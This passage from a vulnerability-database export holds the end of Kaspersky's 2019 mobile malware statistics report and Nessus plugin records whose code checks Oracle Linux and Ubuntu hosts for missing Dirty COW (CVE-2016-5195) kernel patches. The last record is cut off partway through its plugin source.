do not rule out its return to the top.\n\n_Number of unique users attacked by the Hqwar mobile dropper in 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152439/mobile_report_2019_10-en-hqwar-attacks.png>)\n\nIn ninth position is another dropper, this time from the Lezok family: Trojan-Dropper.AndroidOS.Lezok.p (1.76%). A notable difference between this Trojan and Hqwar is that the malware penetrates the device before it arrives at the store. This is evidenced by KSN statistics showing that the Trojan was most often detected in the system directory under the names PhoneServer, GeocodeService, and similar. \n\n| Path to the detected threat | Number of unique users attacked \n---|---|--- \n1 | /system/priv-app/PhoneServer/ | 49,688 \n2 | /system/priv-app/GeocodeService/ | 9747 \n3 | /system/priv-app/Helper/ | 6784 \n4 | /system/priv-app/com.android.telephone/ | 5030 \n5 | /system/priv-app/ | 1396 \n6 | /system/priv-app/CallerIdSearch/ | 1343 \n \nWhen the device is turned on, Lezok dumps its payload into the system; it does so even if the victim deletes the dumped files using regular OS tools or resets the device to the factory settings. The trick is that the Trojan forms part of the factory firmware and can reload (restore) the deleted files.\n\nThe final Trojan worthy of attention is Trojan-Downloader.AndroidOS.Helper.a (1.56%), which finished eleventh in the rankings. Despite claims to the contrary, it can be removed. However, the infected system contains another Trojan that installs a helper app, which cannot be removed that easily. According to KSN statistics, members of the Trojan-Downloader.AndroidOS.Triada and Trojan.AndroidOS.Dvmap families can act as delivery vehicles for the helper. After the victim removes the helper, a member of one of these two families loads and reinstalls it. \n\n### Mobile banking Trojans\n\nIn 2019, we detected 69,777 installation packages for mobile banking Trojans, which is half last year's figure. However, the share of banking Trojans out of all detected threats grew slightly as a consequence of the declining activity of other classes and families of mobile malware.\n\n_Number of installation packages of mobile banking Trojans detected by Kaspersky in 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152443/mobile_report_2019_11-bankers-install-packages.png>)\n\nThe number of detected installation packages for banking Trojans as well as the number of attacks were influenced by the campaign to distribute the Asacub Trojan, whose activity has plummeted starting in April 2019. \n\n_Number of attacks by mobile banking Trojans in 2018\u20132019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152448/mobile_report_2019_12-en-bankers-attacks.png>)\n\nIt is worth noting that the average number of attacks over the year was approximately 270,000 per month. \n\n**Top 10 countries by share of users attacked by banking Trojans**\n\n| Country | %* \n---|---|--- \n1 | Russia | 0.72 \n2 | South Africa | 0.66 \n3 | Australia | 0.59 \n4 | Spain | 0.29 \n5 | Tajikistan | 0.21 \n6 | Turkey | 0.20 \n7 | USA | 0.18 \n8 | Italy | 0.17 \n9 | Ukraine | 0.17 \n10 | Armenia | 0.16 \n \n_*Share of users attacked by mobile bankers out of all attacked users_\n\nRussia (0.72%) has headed our Top 10 for three consecutive years: many different Trojan families are focused on stealing credentials from Russian banking apps. These Trojans operate in other countries as well. Thus, Asacub is the number one threat in Tajikistan, Ukraine, and Armenia, while the Svpeng family of Trojans is active in Russia and the US.\n\nIn South Africa (0.66%), the most common Trojan was Trojan-Banker.AndroidOS.Agent.dx, accounting for 95% of all users attacked by banking threats. \n\nThe most widespread Trojan in Australia (0.59%) was Trojan-Banker.AndroidOS.Agent.eq (77% of all users attacked by banking threats).\n\nIn Spain (0.29%), banking malware from the Cebruser and Trojan-Banker.AndroidOS.Agent.ep families are popular with cybercriminals (49% and 22% of all users attacked by banking threats, respectively).\n\n**Top 10 families of mobile bankers in 2019**\n\n| Family | %* \n---|---|--- \n1 | Asacub | 44.40 \n2 | Svpeng | 22.40 \n3 | Agent | 19.06 \n4 | Faketoken | 12.02 \n5 | Hqwar | 3.75 \n6 | Anubis | 2.72 \n7 | Marcher | 2.07 \n8 | Rotexy | 1.46 \n9 | Gugi | 1.34 \n10 | Regon | 1.01 \n \n_*Share of users attacked by this family of mobile bankers out of all users attacked by mobile banking Trojans_\n\n### Mobile ransomware Trojans\n\nIn 2019, we detected 68,362 installation packages for ransomware Trojans, which is 8,186 more than in the previous year. However, we observed a decline in the generation of new ransomware packages throughout 2019. The minimum was recorded in December. \n\n_Number of new installation packages for mobile banking Trojans in Q1\u2013Q4 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152452/mobile_report_2019_13-ransomware-packages.png>)\n\nA similar picture is seen for attacked users. Whereas in early 2019, the number of attacked users peaked at 12,004, by the end of the year, the figure had decreased 2.6 times.\n\n_Number of users attacked by mobile ransomware Trojans in 2018\u20132019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152457/mobile_report_2019_14-en-ransom-attack-users.png>)\n\n_Countries by share of users attacked by mobile ransomware in 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152502/mobile_report_2019_15-en-ransomware-geo.png>)\n\n**Top 10 countries by share of users attacked by ransomware Trojans**\n\n| Country* | %** \n---|---|--- \n1 | USA | 2.03 \n2 | Kazakhstan | 0.56 \n3 | Iran | 0.37 \n4 | Mexico | 0.11 \n5 | Saudi Arabia | 0.10 \n6 | Pakistan | 0.10 \n7 | Canada | 0.10 \n8 | Italy | 0.09 \n9 | Indonesia | 0.08 \n10 | Australia | 0.06 \n \n_*Excluded from the rating are countries with fewer than 25,000 active users of Kaspersky mobile solutions in the reporting period. \n**Unique users attacked by mobile ransomware in the country as a percentage of all users of Kaspersky mobile solutions in the country._\n\nFor the third year in a row, first place by share of users attacked by mobile ransomware went to the US (2.03%). Same as last year, the Svpeng ransomware family was the most commonly encountered in the country. It was also the most widespread in Iran (0.37%).\n\nThe situation in Kazakhstan (0.56%) was unchanged: the country still ranks second, and the most prevalent threat there remains the Rkor family. \n\n## Conclusion\n\nThe year 2019 saw the appearance of several highly sophisticated mobile banking threats, in particular, malware that can interfere with the normal operation of banking apps. The danger they pose cannot be overstated, because they cause direct losses to the victim. It is highly likely that this trend will continue into 2020, and we will see more such high-tech banking Trojans.\n\nAlso in 2019, attacks involving the use of mobile stalkerware became more frequent, the purpose being to monitor and collect information about the victim. In terms of sophistication, stalkerware is keeping pace with its malware cousins. It is quite likely that 2020 will see an increase in the number of such threats, with a corresponding rise in the number of attacked users.\n\nJudging by our statistics, adware is gaining ever more popularity among cybercriminals. In all likelihood, going forward we will encounter new members of this class of threats, with the worst-case scenario involving adware modules pre-installed on victims' devices.\n\n[](<https://www.brighttalk.com/webcast/15591/388802?utm_source=securelist&utm_medium=blog&utm_campaign=gl_webinar-yara-2020_sl0099&utm_content=link&utm_term=gl_securelist__sl0099_link_blog_webinar-yara-2020>)", "modified": "2020-02-25T10:00:43", "published": "2020-02-25T10:00:43", "id": "SECURELIST:B700542D10BA5EEA36C5D69A24B3C6EE", "href": "https://securelist.com/mobile-malware-evolution-2019/96280/", "type": "securelist", "title": "Mobile malware evolution 2019", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-17T12:50:48", "description": "From Red Hat Security Advisory 2016:2098 :\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* A race condition was found in the way the Linux kernel's memory\nsubsystem handled the copy-on-write (COW) breakage of private\nread-only memory mappings. An unprivileged, local user could use this\nflaw to gain write access to otherwise read-only memory mappings and\nthus increase their privileges on the system. (CVE-2016-5195,\nImportant)\n\nRed Hat would like to thank Phil Oester for reporting this issue.", "edition": 36, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-25T00:00:00", "title": "Oracle Linux 7 : kernel (ELSA-2016-2098) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "modified": "2016-10-25T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:kernel-debug", "p-cpe:/a:oracle:linux:kernel-devel", "p-cpe:/a:oracle:linux:kernel-doc", "p-cpe:/a:oracle:linux:kernel-tools", "p-cpe:/a:oracle:linux:perf", "p-cpe:/a:oracle:linux:kernel-debug-devel", "p-cpe:/a:oracle:linux:kernel-tools-libs", "p-cpe:/a:oracle:linux:kernel-headers", "p-cpe:/a:oracle:linux:kernel-abi-whitelists", "p-cpe:/a:oracle:linux:kernel", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:kernel-tools-libs-devel", "p-cpe:/a:oracle:linux:python-perf"], "id": "ORACLELINUX_ELSA-2016-2098.NASL", "href": "https://www.tenable.com/plugins/nessus/94247", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2016:2098 and \n# Oracle Linux Security Advisory ELSA-2016-2098 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94247);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-5195\");\n script_xref(name:\"RHSA\", value:\"2016:2098\");\n script_xref(name:\"IAVA\", value:\"2016-A-0306\");\n\n script_name(english:\"Oracle Linux 7 : kernel (ELSA-2016-2098) (Dirty COW)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2016:2098 :\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* A race condition was found in the way the Linux kernel's memory\nsubsystem handled the copy-on-write (COW) breakage of private\nread-only memory mappings. An unprivileged, local user could use this\nflaw to gain write access to otherwise read-only memory mappings and\nthus increase their privileges on the system. (CVE-2016-5195,\nImportant)\n\nRed Hat would like to thank Phil Oester for reporting this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-October/006442.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/25\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-5195\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2016-2098\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"3.10\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-327.36.3.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-abi-whitelists-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-abi-whitelists-3.10.0-327.36.3.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-debug-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-327.36.3.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-debug-devel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-327.36.3.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-devel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-327.36.3.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-doc-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-doc-3.10.0-327.36.3.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-headers-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-327.36.3.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-tools-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-327.36.3.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-tools-libs-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-327.36.3.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-tools-libs-devel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-327.36.3.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"perf-3.10.0-327.36.3.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-327.36.3.el7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T07:21:49", "description": "It was discovered that a race condition existed in the memory manager\nof the Linux kernel when handling copy-on-write breakage of private\nread-only memory mappings. A local attacker could use this to gain\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 36, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-25T00:00:00", "title": "Ubuntu 16.10 : linux-raspi2 vulnerability (USN-3107-2) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.8-raspi2", "cpe:/o:canonical:ubuntu_linux:16.10"], "id": "UBUNTU_USN-3107-2.NASL", "href": "https://www.tenable.com/plugins/nessus/94249", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3107-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94249);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/09/18 12:31:46\");\n\n script_cve_id(\"CVE-2016-5195\");\n script_xref(name:\"USN\", value:\"3107-2\");\n script_xref(name:\"IAVA\", value:\"2016-A-0306\");\n\n script_name(english:\"Ubuntu 16.10 : linux-raspi2 vulnerability (USN-3107-2) (Dirty COW)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that a race condition existed in the memory manager\nof the Linux kernel when handling copy-on-write breakage of private\nread-only memory mappings. A local attacker could use this to gain\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3107-2/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected linux-image-4.8-raspi2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.8-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/25\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-5195\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3107-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.10\", pkgname:\"linux-image-4.8.0-1017-raspi2\", pkgver:\"4.8.0-1017.20\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.8-raspi2\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T07:21:48", "description": "It was discovered that a race condition existed in the memory manager\nof the Linux kernel when handling copy-on-write breakage of private\nread-only memory mappings. A local attacker could use this to gain\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 38, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-20T00:00:00", "title": "Ubuntu 16.10 : linux vulnerability (USN-3107-1) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.8-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.8-lowlatency", "cpe:/o:canonical:ubuntu_linux:16.10", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.8-generic-lpae"], "id": "UBUNTU_USN-3107-1.NASL", "href": "https://www.tenable.com/plugins/nessus/94159", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3107-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94159);\n script_version(\"2.17\");\n script_cvs_date(\"Date: 2019/09/18 12:31:46\");\n\n script_cve_id(\"CVE-2016-5195\");\n script_xref(name:\"USN\", value:\"3107-1\");\n script_xref(name:\"IAVA\", value:\"2016-A-0306\");\n\n script_name(english:\"Ubuntu 16.10 : linux vulnerability (USN-3107-1) (Dirty COW)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that a race condition existed in the memory manager\nof the Linux kernel when handling copy-on-write breakage of private\nread-only memory mappings. A local attacker could use this to gain\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3107-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-4.8-generic,\nlinux-image-4.8-generic-lpae and / or linux-image-4.8-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.8-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.8-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.8-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n 